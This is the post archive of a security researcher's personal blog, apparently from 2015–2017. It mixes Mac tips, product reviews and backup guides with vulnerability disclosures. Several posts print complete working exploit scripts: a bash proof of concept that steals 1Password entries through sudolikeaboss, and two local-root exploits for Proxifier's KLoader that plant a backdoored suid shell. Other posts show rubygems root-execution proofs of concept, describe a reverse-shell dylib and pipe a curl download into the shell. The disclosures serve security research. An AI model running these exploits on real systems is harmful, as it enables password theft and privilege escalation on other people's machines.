Get more battery life out of your 2016 Macbook Pro

26 May 2017 08:10

The new macbook pros are divisive in many ways, not least of which is the
reportedly less than stellar battery life compared to the previous generation.
I bought the escape version which has innately better battery life than the
touchbar version, but opted for the i7.  My strategy in the past has always been
to max the spec as much as I can afford so the machine will last a long time but
this time around there isn't a huge difference in performance between the i5 and
the i7.  If you're not doing a lot of intensive processing you may be better
served with the i5.

Anyway, I've found a novel way to get a little bit more battery life out of any
recent mac computer using a kernel extension from an app called "Turbo Boost
Switcher".  You can find it here:

https://github.com/rugarciap/Turbo-Boost-Switcher/tree/master/Turbo%20Boost%20Disabler/DisableTurboBoost.64bits.kext

This kext, when loaded, disables the turbo boost feature of the CPU causing it
to never exceed its rated clock frequency and thus consume less energy at the
cost of some performance.  This only really makes a noticeable difference if
you're running tasks that would have actually pushed the CPU into boot mode
anyway, but if you want to squeeze every last bit of battery life out of your
new machine it may help.  In my testing with the Intel Power Gadget I found that
event just browsing around websites in Safari or Chrome would frequently push
the CPU over the boost line.

I use an app called ControlPlane - https://www.controlplaneapp.com - to load and
unload the kext when the machine is disconnected from and connected to a power
source.  So on AC power it runs full-tilt, on battery it loads the kext to
maximise battery life.  To get this to work I recommend creating two scripts,
one that disables the turbo (loads the kext) and another that enables it again
(unloads the kext).  Eg:

disable_turbo.sh
--------------------------
#!/bin/bash
/sbin/kextload /usr/local/kexts/DisableTurboBoost.64bits.kext

enable_turbo.sh
--------------------------
#!/bin/bash
/sbin/kextunload /usr/local/kexts/DisableTurboBoost.64bits.kext

Because kexts can only be loaded or unloaded as root, these will need to be
executed as root.  The easiest way to facilitate this is to add the scripts to
your sudoers file so they can be executed without a password, eg:

user ALL=(ALL) NOPASSWD: /usr/local/bin/enable_turbo
user ALL=(ALL) NOPASSWD: /usr/local/bin/disable_turbo

(Replace "user" with your username)

Now in ControlPlane you can use the shell commands:

sudo /usr/local/bin/enable_turbo

and

sudo /usr/local/bin/disable_turbo

To switch the turbo on and off.

Enjoy the Cylance

11 May 2017 22:08

I blogged about Cylance a couple of times earlier this year after testing their
endpoint security product CylancePROTECT on MacOS.  I ended up deleting both
blog posts shortly after posting them because I was concerned about
inaccuracies in the original post and wanted to give Cylance a chance to
respond to the issues I raised.

Having now tested it for a good few months I think I'm in a good position to
give a fair and honest review of the product.  This post is 100% related to the
MacOS version of CylancePROTECT - I have never tested the Windows version in
any way.

My original post about Cylance highlighted the fact that after installing it I
was able to find some OSX malware samples with a quick google search for "OSX
malware samples" which were not detected by Cylance.  The first result to my
google search was objectivesee.com run by the very awesome Patrick Wardle, an
independent security researcher.  These samples included OSX.Mokes which was
described in a blog post in September 2016 as a "sophisticated MacOS backdoor":

https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/

Despite being blogged about publicly in early September and known to VirusTotal
not long afterwards, the current release of CylancePROTECT I was using in
February 2017 did not detect OSX.Mokes, along with a couple of other OSX
samples.

I reported this issue to them and was told a couple of weeks later that they had
"taken the issue very seriously", "escalated it internally" and had "updated
their math model" to deal with it.

So again I tested Cylance with the new malware and found that it did now
detect it, but only the exact OSX.Mokes binary that I had reported.  If I
changed a single byte (such as a character in one of the c&c domains listed in
the binary) Cylance would no longer detect it.  I again reported this issue to
Cylance and it turned out that although they had updated their math model, the
new model hasn't been released yet.  As an interim measure Cylance had added the
sha256 hash of the binary to a global quarantine list but this would only work
if it was an exact match.

To be clear on the timeframes here:

- The malware samples in question were known to VirusTotal in the latter part of
  2016.

- The false positives were reported to Cylance in early February 2017 - still
  undetected despite being in VirusTotal for at least 3 months

Around April 20th 2017 the InfinityEngine (Cylance's cloud service) was updated
with the new math model.  Unfortunately this doesn't really provide much
protection - if a modified version of OSX.Mokes is scanned by Cylance it will
initially not detect it, even if the modification is only a single byte.  If the
policy on the endpoint has auto-upload enabled it will upload un-previously-seen
binaries to Infinity.  Some time later the Infinity Engine, with its new math
model, will classify the binary as bad and this will get picked up in the local
user's Cylance agent.  However the time for this to occur is such that a user
could easily have executed the binary and become compromised in the meantime.

At the time of writing, 11th May 2017 9pm BST, I still don't have the updated
math model that detects OSX.Mokes other than via a static sha256 hash.
Modified version of it will eventually get picked up and blacklisted by the
InfinityEngine but this is a fairly weak defence.  Even free signature scanners
like ClamAV are able to detect modified versions of Mokes that still contain
the same signature.

More recently the handbrake.br website was hacked and the application was
implanted with a malware called Photon.B.  I tested the sample with the local
agent I have and found that Cylance did not detect it.  Additionally, uploading
it to the Infinity Engine also did not result in detection, so the new math
model that is pending release to local agents still doesn't pick it up.
Admittedly at the time I tested this the traditional signature scanners weren't
detecting it either but this is where Cylance is meant to be superior.

This is Patrick Wardle's post about this attack:

https://objective-see.com/blog/blog_0x1D.html

At least this time Cylance were aware of the issue internally and are working to
resolve it.

Another recent MacOS malware development is a new variant of the Dok malware.
Dok.A is detected by Cylance but Dok.B is not.  Cylance sells itself exactly on
this kind of detection - variants and mutations of pre-existing malware - but
here it is failing to do exactly what it is marketed to do.

ref: https://twitter.com/objective_see/status/859240059471638528

Another instance of Cylance failing to do its job was when I recently discovered
an RCE vulnerability in a popular virtualisation product.  I can't give details
yet because the vendor hasn't patched it but essentially it allows a vector for
injecting a malicious dylib.  I quickly knocked up a dylib that had no actual
library code but just a constructor that initiates a reverse tcp shell
connection to the attacker on a pre-determined IP address.  When compiled this
was not detected by Cylance as malicious at all, despite it being a library with
a) no library code and b) an obviously malicious constructor.  The reason for
putting the payload in the constructor is that this gets called as soon as the
library is loaded into the parent process so there's no need to wait for it to
actually call a specific function in the library.

So all this negativity and failure.. at this point if you're still reading you
probably think I don't think very highly of Cylance or their product.
Surprisingly, that's not the case.  I actually think CylancePROTECT is a pretty
cool product despite it's apparent ineffectiveness as an antivirus solution.

In the media and even in Cylance's own marketing the focus is on AV, and
understandably so, but it does more than just AV.  As well as the
machine-learning AV engine CylancePROTECT also provides memory exploit
protection and is able to stop a long list of memory exploitation techniques.
It's simple to test the effectiveness of these - grab MetaSploit and try running
some MacOS memory corruption exploits.  I quickly found that Cylance blocked
them purely based on behaviour rather than statically analysing the binary.

It's worth mentioning as well that of the malware binaries that Cylance did
detect, I was able to modify them extensively without breaking the detection.

I've a pretty competent computer user and don't really need antivirus in any
form, the only reason I ever run it is because it's required by the corporate
policies of clients that I worked with when I'm on site.  I know what malware
looks like and what not to open so regardless of the effectiveness of the AV
I'm probably not going to get owned like that (although handbrake.br getting
owned is a potential and worrying vector!).  0day exploits however are a
different thing entirely and having something that can actually defend against
this kind of attack is pretty cool.  Some of the incumbent AV products claim
to defend against this but as far as I can tell it's all just based on
reacting to known threats and releasing signatures as fast as possible.
Technologies like Bromium look like a really cool way to defend against exploits
but it's not available to end users or event SMBs running MacOS yet.

Cylance also has some pretty clever and well thought out protection against a
local user disabling or bypassing the agent.  With a "completely locked down"
policy I have been unable to disable the agent even as root - despite a lot of
effort spent trying.  The kernel driver disallows access to pretty much every
file related to Cylance and blocks all signals to its processes.

To summarise I think Cylance is cool tech and I hope that it gets better on
MacOS over the next year or two.  Given how much Cylance is valued at I'm
willing to believe that the Windows version is way more effective at AV than the
Mac version but I don't really care enough about Windows to test it.  It would
stand to reason though - there's likely much more Windows malware to train the
ML algorithm with and a much bigger market to motivate the company.

I'd like to see Apple implement some of Cylance's memory protection techniques
into the kernel but I'm not holding my breath as they're clearly not very
focused on security.

If you know what you're doing with computers, unlikely to click on a dodgy
attachment and work in industries that could be deliberately targeted by
attackers you might want to add CylancePROTECT to your defences.

I would also highly recommend BlockBlock by Patrick Wardle for Mac users looking
for additional protection.  BlockBlock was able to detect and block Photon.B
from persisting itself when none of the traditional AV or CylancePROTECT was
able to.  And it's free!

sudolikeaboss allows password theft

3 May 2017 13:12

sudolikeaboss is a neat little program that acts as a command-line interface to
1Password Pro, effectively giving you a way to use 1password with the terminal.

This is useful but it does come with a security tradeoff as any application
running in the context of the user can potentially steal passwords if 1password
is in an unlocked state.

This isn't so much of an issue in the official browser extension as there's no
way for a malicious website to invoke applescript or execute arbitrary code.

I don't want to overstate this as it's a fairly limited exploit - it only works
if 1password is unlocked and the screen isn't locked, meaning the user will
almost certainly be aware that it's happened.  Also it requires the attacker to
be able to execute code on the machine in the first place, but a user tricked
into running such a malicious application could potentially have multiple
account passwords stolen.  A carefully orchestrated spearphishing attack could
combine this with automated password changes to lock the victim out of their
accounts.

The exploit below demonstrates how sudolikeaboss can be abused using AppleScript
to steal the first result of a quick search for a string within 1password.  Use
a parameter like "gmail" or "twitter" to see how quickly it can steal your
passwords.

https://m4.rkw.io/sudolikeyoureowned.sh.txt
-------------------------------------------
#!/bin/bash

####################################################
# sudolikeaboss 0.3.0-beta1 password theft exploit #
####################################################
# by m4rkw,  shouts to #coolkids :P                #
####################################################

# sudolikeaboss is very convenient but convenience is often a tradeoff
# for security.  This PoC demonstrates password theft when 1password
# is in an unlocked state.
#
# The parameter will be used to search 1password and return the first
# matching result.  A good choice would be "twitter" or "gmail".

if [ "$1" == "" ] ; then
  echo "Usage: $0 <1password search string>"
  exit 0
fi

cat > sudo_as.txt <<EOF
delay 0.3
tell application "System Events"
EOF

echo "$1" | fold -w1 |sed 's/^/  keystroke "/g' |sed 's/$/"/g' >> sudo_as.txt

cat >> sudo_as.txt <<EOF
  delay 0.5
  key code 36
end tell
EOF

osacompile -o sudo_as.scpt sudo_as.txt

osascript "./sudo_as.scpt" &

pass=`sudolikeaboss`

echo "Password stolen: $pass"

CVE-2017-7690 Local root privesc in Proxifier for Mac 2.19

11 Apr 2017 20:57

With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader
binary that ships with Proxifier <= 2.18.

Unfortunately 2.19 is also vulnerable to a slightly different attack that
yields the same result.

When Proxifier is first run, if the KLoader binary is not suid root it gets
executed as root by Proxifier.app (the user is prompted to enter an admin
password).  The KLoader binary will then make itself suid root so that it
doesn't need to prompt the user again.

The Proxifier developers added parameter sanitisation and kext signature
verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app
does no verification of the KLoader binary that gets executed as root.

The directory KLoader sits in is not root-owned so we can replace it with
our own binary that will get executed as root when Proxifier starts.

To avoid raising any suspicion, as soon we get executed as root we can swap
the real KLoader binary back into place and forward the execution call on
to it.  It does require the user to re-enter their credentials the next time
Proxifier is run but it's likely most users wouldn't think anything of this.

Users should upgrade to version 2.19.2.

https://m4.rkw.io/proxifier_privesc_219.sh.txt
3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac
-------------------------------------------------------------------

#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.19                                           #
#####################################################################
# by m4rkw,  shouts to #coolkids :P                                 #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
  setuid(0);
  seteuid(0);

  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF

gcc -o /tmp/a a.c

cat > a.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(int ac, char *av[])
{
  if (geteuid() != 0) {
    printf("KLoader: UID not set to 0\n");
    return 104;
  } else {
    seteuid(0);
    setuid(0);

    chown("/tmp/a", 0, 0);
    chmod("/tmp/a", strtol("4755", 0, 8));
    rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");
    chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
    chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));
    execv("/Applications/Proxifier.app/Contents/KLoader", av);

    return 0;
  }
}
EOF

mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2
gcc -o /Applications/Proxifier.app/Contents/KLoader a.c
rm -f a.c

echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root."

-------------------------------------------------------------------

CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18

10 Apr 2017 21:19

Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a
KLoader binary which it installs suid root the first time Proxifier is run. This
binary serves a single purpose which is to load and unload Proxifier's kernel
extension.

Unfortunately it does this by taking the first parameter passed to it on the
commandline without any sanitisation and feeding it straight into system().

This means not only can you load any arbitrary kext as a non-root user but you
can also get a local root shell.

Although this is a bit of a terrible bug that shouldn't be happening in 2017,
Proxifier's developers fixed the issue in record time so that's something!

Everyone using Proxifier for Mac should update to 2.19 as soon as possible.

https://m4.rkw.io/proxifier_privesc.sh.txt
6040180f672a2b70511a483e4996d784f03e04c624a8c4e01e71f50709ab77c3
-------------------------------------------------------------------

#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.18                                           #
#####################################################################
# by m4rkw                                                          #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
  setuid(0);
  seteuid(0);

  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF

gcc -o /tmp/a a.c
rm -f a.c
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a'
/tmp/a

-------------------------------------------------------------------

Making sure your S3 backup worked

4 Jan 2017 18:21

As a follow-up to my previous post about making immutable S3 backups using
Lambda, this is an additional Lambda function you can use to verify that your
backup actually ran.

You'll want to configure it to run at around 10-15mins past the hour so the
backup has some time to complete.  It will look for the backup files that should
exist and send an email if they don't.

https://m4.rkw.io/lambda2.py

Using lambda to make immutable S3 backups

2 Jan 2017 17:55

S3 is really handy for server backups and at $0.023/GB/month it's incredibly
cost-effective.

However the default way most people use it is to simply spray their data
directly into an S3 bucket from the machine they're backing up.  This works fine
right up until you get hacked by someone malicious who then has the ability to
trash all of your backups from the machine that has access to the bucket.

Enter lambda, Amazon's magic function-in-the-sky service that allows you to do
serverless computation.

This post describes how to secure your backups using a lambda function.

Scenario: a server that creates tarball backups overnight of around 5GB and
hourly SQL snapshots that are around ~250MB.

We will create two S3 buckets - backups1 and backups2.

The server will have write access to backups1 but no access to backups2.

The process the backups will follow is:

1. The server will execute its backup and write a file to backups1 called
backup.tar.gz.gpg.  This might be done with a cron job along the lines of:

/bin/tar -cP /data | /bin/gzip | /usr/bin/gpg --no-use-agent --no-tty
--passphrase-file /root/key --cipher-algo AES256 -c | /usr/local/bin/s3cmd put -
s3://backups1/backup.tar.gz.gpg

2. Any writes to the backups1 bucket will trigger this lambda function:

https://m4.rkw.io/lambda.py

3. The lambda function checks the name of the uploaded object.  If it's
backup.tar.gz.gpg it will check for a file in the backups2 bucket called
{YYYY-mm-dd}.tar.gz.gpg.  If the file doesn't exist then it will move
backup.tar.gz.gpg from backups1 to backups2 using the timestamped filename.
If it already exists it will do nothing - this prevents backups from being
overwritten once created.

4. The lambda function also handles hourly sql snapshots - if the uploaded file
is called sql.gz.gpg it will look for an object called
{YYYY-mm-dd}.{HH}.sql.gz.gpg.  Again if the file doesn't exist it will move the
uploaded file to backups2 using the timestamped name.

Because the filenames are determined by the lambda function which cannot be
changed by the server, an attacker breaking into the server has no way to
destroy any previously created backups.  This is a lot more secure than simply
writing the data straight into S3 from a server that has full access to the
target bucket.

Note that because the backup archives are written based on timestamps you must
set the timezone in the lambda function to the timezone of your server to avoid
issues.

You will probably also want to create a lifecycle policy for your backups2
bucket to delete the backups after a certain time period or archive them to
glacier long term storage.

How to get vi keybindings in bash and the MySQL client

11 Dec 2016 19:22

The vim keybindings are wonderful once you get used to them.

What some people don't know is that the same keybindings are available in other
programs, for example bash has a "vi mode" which can be enabled with:

set -o vi

Once enabled you can hit escape and get the familiar keybindings to edit the
commandline.

The MySQL client also has a vi mode which can be enabled by placing the following
into your ~/.inputrc:

set editing-mode vi


With these tricks the power of vim need not be constrained solely to the editor.

How to create a bootable FileVault2-encrypted SuperDuper! clone

11 Dec 2016 13:11

SuperDuper! from ShirtPocket software is fantastic backup utility.  It lets you
create a full bootable clone of your mac that you can boot from any machine.

Not only is this a great way to backup your data but if your main machine dies
you can plug the backup drive into any mac, boot from it using the option key
at startup and be straight back into your environment.

SuperDuper! doesn't natively support FileVault but there is a way you can use.
It's a bit cumbersome to set up but once done it works really well.

1. First create a full SuperDuper clone of your main drive as normal onto an
unencrypted volume.

2. Boot from the external disk into the clone'd environment.

3. Reinstall MacOS in the clone'd environment.  This is necessary in order to
create the hidden partitions that allow FileVault to work.

4. After the install has finished, boot again into the clone'd environment
and enable FileVault.  You don't need to wait for it to finish encrypting.

5. Reboot into the main mac environment.

6. The FileVault encryption process will continue in the background all the
time the drive is mounted but if you want to ensure all the files are
encrypted as soon as possible I recommend the following:

6.1. Delete all the files from the backup drive.

6.2. Run SuperDuper again from the main mac drive to the backup drive.
Since FileVault is now enabled they will be automatically encrypted as they
are written.

Once this finishes you now have a fully bootable clone of your mac that you
can update with SuperDuper as necessary.

linux/vim lifehack: sourcing a temporary local environment

10 Dec 2016 17:18

If you're a vim fanboy like me you may often find it frustrating when logging into
another machine that the default vim config isn't very nice to use.  Sometimes the
remote machine has a shared user account so changing it to your liking isn't really
practical.

To work around this and make my life easier I created this:

https://a.rkw.io/env-nonstatic

which I can source from any linux machine to instantly give me a sane but still
temporary vim config.  It first sources the .bash_profile so we have anything that
we might need from there, then processes all of my personal environment config.
Vim is alias'd to load a temporary config file stored in /tmp so I can use my own
config for the remainder of the session without affecting other users.

To make this even more useful I use the awesome program TextExpander from Smile
Software which allows you to make system-wide keyboard snippets that expand into
useful macros.  So now all I have to type on any linux machine I log into it:

;env

and it will automatically expand to:

. <(curl https://a.rkw.io/env-nonstatic 2>/dev/null)

and it even presses enter for me :)  How cool is that?

Ruby gems can execute code as root while they're being installed

29 May 2016 18:07

Another hilarious and trivial rubygems exploit.  The file ext/<ext>/extconf.rb
gets executed as root during installation.  A malicious gem could put code in
there that installs a backdoor.

Demonstration PoC: https://github.com/m4rkw/rubygems-poc2

$ ls -la /tmp/lol<br/>
ls: cannot access /tmp/lol: No such file or directory<br/>
$ sudo gem install file-4.3.2.gem <br/>
Building native extensions.  This could take a while...<br/>
Successfully installed file-4.3.2<br/>
Parsing documentation for file-4.3.2<br/>
Done installing documentation for file after 0 seconds<br/>
1 gem installed<br/>
$ /tmp/lol<br/>
# id<br/>
uid=0(root) gid=1000(mark) groups=0(root),1000(mark),1003(admin)<br/>
# <br/>

Again, be *very* careful what gems you install!

Abusing rubygems for fun and profit

29 May 2016 12:18

RubyGems is a nice system, very easy to use and also easy to abuse.  Anyone can push
a gem straight into the global namespace, even if the gem has the same name as a core
library.

This can be trivially abused to break into systems of anyone who isn't very careful
what gems they use (and let's be honest, that's probably a lot of developers :).

Ruby gems can include executable scripts which get installed into /usr/local/bin/.
On Ubuntu, Centos and probably most other linux distros, /usr/local/bin takes precedence
over /bin, /usr/bin, /sbin etc.  This means we can drop a fake "ls" script into
/usr/local/bin/ which will get executed every time the user types ls.

A PoC for this can be found here: https://github.com/m4rkw/rubygems-poc

Once installed the fake ls binary takes precedence and can then silently run whatever
malicious code you like (eg a connect-back shell to a remote system) before passing
the args onto the real ls.

The PoC just prints a silly message.

    $ ls<br/>
    bin  file-4.3.2.gem  file.gemspec  lib  LICENSE  README<br/>
    $ sudo gem install file-4.3.2.gem<br/>
    Successfully installed file-4.3.2<br/>
    Parsing documentation for file-4.3.2<br/>
    Installing ri documentation for file-4.3.2<br/>
    Done installing documentation for file after 0 seconds<br/>
    1 gem installed<br/>
    $ ls<br/>
    /============\<br/>
    | LOL HAXXED |<br/>
    \============/<br/>
    bin  file-4.3.2.gem  file.gemspec  lib  LICENSE  README<br/>
    $

At the time of writing the "file" gem name isn't taken so anyone could push a gem
straight into rubygems that would be installed whenever anyone types "gem install file".
This could easily catch someone out if they don't realise that the File class is built-in
rather than provided by a gem.

Another vector would be creating a small gem that actually does something useful and
just wait for people to install it.  I wrote a simple Transmission API library and got
hundreds of downloads.


Conclusions
===========

Since there's very little inherent security it seems the onus is on developers to be
careful what gems they install.  However since most gems don't need to install executables
it would probably be sensible for the rubygems maintainers to make the "gem" command
explicitly warn users if they're installing an executable.

Tethery - bypass iOS tethering restrictions

12 Nov 2015 12:28

I decided to roll my tethering bypass idea into a script to make it easy to use.

This script automates the fiddly configuration bits and gives you a quick way to throw up a
proxy that will bypass tethering restrictions on iOS.

It also disables the carrier's ability to detect that you're tethering because all they can see
is a single SSH connection, meaning they can't bill you for a separate tethering data allowance.

https://github.com/m4rkw/tethery

How to bypass tethering restrictions on iOS

24 Oct 2015 11:26

It's often annoying that Apple lets carriers disable tethering at will, especially when the
carrier has already sold you "unlimited" data.  Three allow free data when roaming in
"feel at home" countries but they don't allow tethering at all, even if you're willing to
pay for it.

After being irritated by these restrictions on several holidays I decided to fix the problem
once and for all.

Turns out it's really simple, you can just create an ad-hoc wifi network between your iphone
and computer, use vSSH to connect to a remote server and spawn a local socks5 proxy, then
use Proxifier on the mac to route all the traffic over the proxy.

This works even if "personal hotspot" isn't available and has the added bonus of completely
hiding the fact that you're tethering from the carrier, as all they can see is the ssh
traffic, so they can't bill you separately for the tethering data. :)

Siri in the car is awesome

15 Oct 2015 22:11

I've always been fairly cynical about Siri.  It seemed more like a gimmick than something people would use seriously
in their day to day lives, but I've recently discovered how wrong I was.

I don't have a CarPlay stereo in my car, because I didn't want to be tied into Apple's apps.  Maps is nowhere near
as good as TomTom (which I also paid good money for) and TomTom doesn't yet have Siri integration.  But I never
even considered that Siri would work with non-CarPlay stereos.  Turns out, as my friend and colleague Paul
mentioned to me in passing, that it does.  I have a Kenwood aftermarket stereo and if I hold the Call button on
the unit, it activates Siri.

It seems to know I'm in the car, so lots of potentially useful requests are denied with "Sorry Mark, I can't do
that while you're in the car", which is a bit annoying, but on the whole it's very useful.  Things that work include:

- Playing music (playlists, songs etc)
- Playing podcasts (only works with the official Podcasts app)
- Switching between music and podcasts
- Reading emails/messages
- Sending emails/messages
- Setting reminders
- Navigation (but only with apple maps)
- Making calls

Just the ability to set reminders while I'm driving, or text my wife when I'm nearly home, is magical.

How to do a fresh installation of iOS 9 without losing data

31 Aug 2015 22:23

Despite Apple's best efforts, there are nearly always a number of users who experience issues after a major iOS
update.  Users might experience crashes, unusually high battery drain, slowness etc etc.

Whenever I upgrade to a major iOS release I usually do a fresh reinstall of iOS.  Although Apple provides no
official way to do this without losing all of your data, it is possible using a third party tool called
iBackupBot which I highly recommend:

http://www.icopybot.com/itunes-backup-manager.htm

Disclaimer

Although this worked for me I take no responsibility for this whatsoever - if you lose data or brick your
device it's entirely your own fault.  PROCEED AT YOUR OWN RISK!

What this does

This will reset all of the settings for your device, but allow you to retain the data for your apps and your
SMS and call histories.  Most of the glitches with major iOS updates are likely due to things like settings
schemas changing which then cause the newly updated device to get confused and possibly get stuck in a loop
causing battery drain.

Steps:

1. Install iOS9 and restore your backup as you normally would.

2. Take a backup in iTunes, go to the MobileSync directory, tar it up and copy it somewhere safe just in case.

3. Close iTunes and open iBackupBot. Open the backup that you just took on the left, you'll see these folders
underneath it:

- System Files
- User App Files
- App Group Files
- App Plugin Files

The first two are the ones we care about.

4. Make a directory on your local machine called "ios data", and underneath that, create "System Files" and
"User App Files".

5. In iBackupBot, click on "System Files" in the left pane, then select all of the directories in the right
pane.  Click Export and choose the "System Files" directory you just created.

6. Repeat step 5 for "User App Files".

At this point you should have a full backup of all of your device's system data (sms, call history etc) and
all the data for your apps.

7. On your device, go to Settings -> General -> Reset -> Erase All Contents and Settings.

This will restore your device to bone stock iOS 9.

Note: as of the latest iOS 9 beta there is a bug that after doing this and putting your iCloud account in,
your contacts may not appear.  Don't panic, just go into iCloud settings, turn off Contacts, and then turn
them back on again and they should start appearing.

8. Install all of the apps that have data you need to restore.

9. In iTunes, make sure backup encryption is OFF and take a backup of the device.

10. Close iTunes and open iBackupBot.

Now what you need to do is import the various bits of your backed up data into the fresh backup using the
Import feature.  What you import here depends on what you care about and want to restore, but I would suggest:

- System Files/HomeDomain/Library/CallHistoryDB/*   (call history)
- System Files/HomeDomain/Library/SMS/sms.db  (sms history)
- System Files/MediaDomain/Library/SMS/*   (media from sms history, eg pics and videos)
- System Files/CameraRollDomain/Media/*    (camera roll images)

As well as any data for apps that you care about.  Note that you can import a whole directory by clicking the
down arrow on the Import button and selecting "Import Folder(s)".

Sometimes iBackupBot will show a warning that the paths you've selected may be invalid, just click OK to
continue and ignore this.  The reason it does this is because you're restoring files from the original
backup that aren't currently present in the new backup and it's worried that they might not be valid places
to put files.

Once this is all done, open iTunes, restore the backup to your device and you should find your stuff has
been restored.

Gangsta Lean ruby web framework

18 Aug 2015 22:22

When I started building my new website, I didn't want to be boring and just use
rails so I decided to write my work super-lightweight ruby web framework.

It's powering this website but is quite basic and rough so probably shouldn't be
used by anyone.

https://github.com/m4rkw/lean

I am planning to use it for an upcoming project so it may get fleshed out a bit
more soon.

TVFeed and TransmissionNG

18 Aug 2015 22:17

I've written a couple of ruby gems that people might find useful..

tvfeed - https://github.com/m4rkw/tvfeed

A gem designed to provide a feed of new TV episodes as magnet links from
torrent sites. This is offered purely for research purposes and should suit
those who wish to independently research the availability of popular TV episodes
on torrent sites.

transmission-ng - https://github.com/m4rkw/transmission-ng

A gem providing a better ruby interface to Transmission's RPC API.

Apple Music is not worthy of the Apple brand

1 Jul 2015 16:53

I wanted to like Apple Music, I really really did.  I never really got into Spotify but the hassle of finding new music is a constant problem for me.
As you can see from my music page on this very website, I go through music at a crazy rate.  I've bought over 1500 songs from iTunes over the last few
years and only around 266 are still in my playlist.  Finding new music that I like is a constant struggle and I generally resort to scraping sites like
beatport.com, phonica, blackmarket records etc looking for new stuff.

So today I tried the Apple Music free trial.

The first page was a load of bubbles with the names of musical genres in them. You are apparently supposed to tap the ones you like, and double-tap
the ones you love.  Straight away there was a glaring problem - none of the genres were the music I actually listen to.  99% of my collection is D&B
and dubstep.  The closest approximations were "dance" or "electronic", but I didn't really fancy my chances much with those kind of vague categories.

But it gets worse..



In order to *remove* genres, as you're apparently supposed to do, you have to hold your finger on them for 3 whole seconds WHILE THE FUCKING THING
MOVES AROUND UNDERNEATH IT!  Is Apple making some kind of very poor-taste joke?!

Finally, I managed to select both "dance" and "electronic", disregard the rest, and move to the next section.  Then I was presented with another set
of bubbles for 20 artists I've never heard of.  Why it was presenting these instead of, oh I don't know, the artists I've ACTUALLY BOUGHT MUSIC FROM,
I have no idea.

After rejecting all of these I got another 20 artists that I barely care about.  The only two I even vaguely like were Prodigy and Nero.  After selecting
these two and killing the rest, I then found that there were no more artists and the next button wouldn't do anything.  There was no obvious indication
why (nice one Apple!) but presumably I hadn't selected enough artists that I don't like in order to continue.

At this point I decided fuck Apple Music in the teeth and wiped it from my devices.  Why they would push artists you don't like or don't know on you
when they have your ENTIRE MUSIC COLLECTION in their cloud is very strange.  Why should I have to select any artists at all?  They KNOW which artists I like
because I BOUGHT THEIR FUCKING MUSIC!

Perhaps they couldn't get those artists, the artists I actually like, to sign up to the service.  In which case they should be smart enough to tell me
upfront "Hey Mark, we don't have any of the artists you like in Apple Music at the moment, still want to continue?"

If they'd done that, and not rolled out an absolutely ridiculous UI, I'd just be mildly disappointed rather than actually angry.

Apple Music is not worthy of the Apple brand.

Smart playlists are too smart for iTunes Match

30 Jun 2015 21:07

This has been driving me nuts for months and I finally figured it out - smart playlists break iTunes Match.

I have a smart playlist simply called "Music" which is configured as:

Match all of:<br/>
 - Media kind is "Music"<br/>
 - Genre is not "Audiobooks"<br/>
No limit<br/>
No "match only ticked items"<br/>
Live updating enabled<br/><br/>

This is intended to always contain all my songs and for the most part it does exactly that.  However, after restoring my iPhone 5S,
enabling iTunes Match and attempting to download this playlist (i.e, all my music..) it starts to download the songs but then starts
adding hundreds of my deleted songs back into iTunes, and thus back into the smart playlist itself.

My previous workaround was to simply disable iTunes Match, sync the songs manually from my mac and then re-enable it again, but if you're
doing that you have to wonder what the point of paying for the service is.

Anyway, today whilst installing the 8.4 release I finally made some progress and figured out that it's something to do with the smart
playlist.  If I put all my (non-deleted) music into a regular playlist and download that right after a restore, it works exactly as it
should.  So it seems that there's some kind of bug in the way smart playlists are handled - they work fine for the most part until you
try to download an entire one on an iDevice.

What's also interesting is that when this starts happening, if I turn off the iPhone it stops straight away, no more deleted songs will
appear in iTunes so it seems to be specific to some API that the iPhone is calling in order to download all the songs.

My best guess is that the API the iPhone calls in order to determine which tracks are in a smart playlist doesn't by default exclude
songs that have been previously deleted.  As it's then downloading all the deleted songs on the iPhone, iTunes Match interprets this as a willful
re-download of the song by me and then undeletes it.

Unfortunately there isn't an obvious way I can see to configure the smart playlist to explictly exclude deleted songs.  It has an "iCloud
Status" field, but it's not possible to have a multi-part OR condition alongside two other AND conditions so I can't really do it.  I think
what you'd need is:

Media kind is "Music" AND Genre is not "Audiobooks" AND ( iCloud Status is "Matched" or iCloud Status is "Uploaded" or iCloud Status is "Purchased" )

Of course the best solution would be for Apple to just fix their broken API.  I've submitted this as bug report #21617107, fingers crossed
someone will pick it up and fix it.  Until then I'll have to stick to a dumb playlist for my "all music" list.

I miss the old days

19 Jun 2015 07:29

I often look back to 1999-ish and miss the fun that we used to have on the internet around then.
Back when memory corruption was trivial and commonplace, when Windows was so insecure that you
could idly amuse yourself by browsing random peoples person files using nothing but the start
menu and when irc networks were an interesting mix of warzone and playground.

So much has moved on since then but it's interesting to note the things that haven't.  Red-boxing
was a thing for a while, and it may surprise many to know that it's still possible, at least in the
UK.  I guess with the advent of mobile phones in the modern era and the miniscule loss from those
who both know how to do it and actualy bother to just isn't worth doing anything about.

More interestingly in the same vein, it's interesting that every single commercial wifi service
I've ever connected to has allowed all DNS traffic pre-auth.  Of course very few people would
have a clue that this can be easily exploited to steal access, and even few of those would
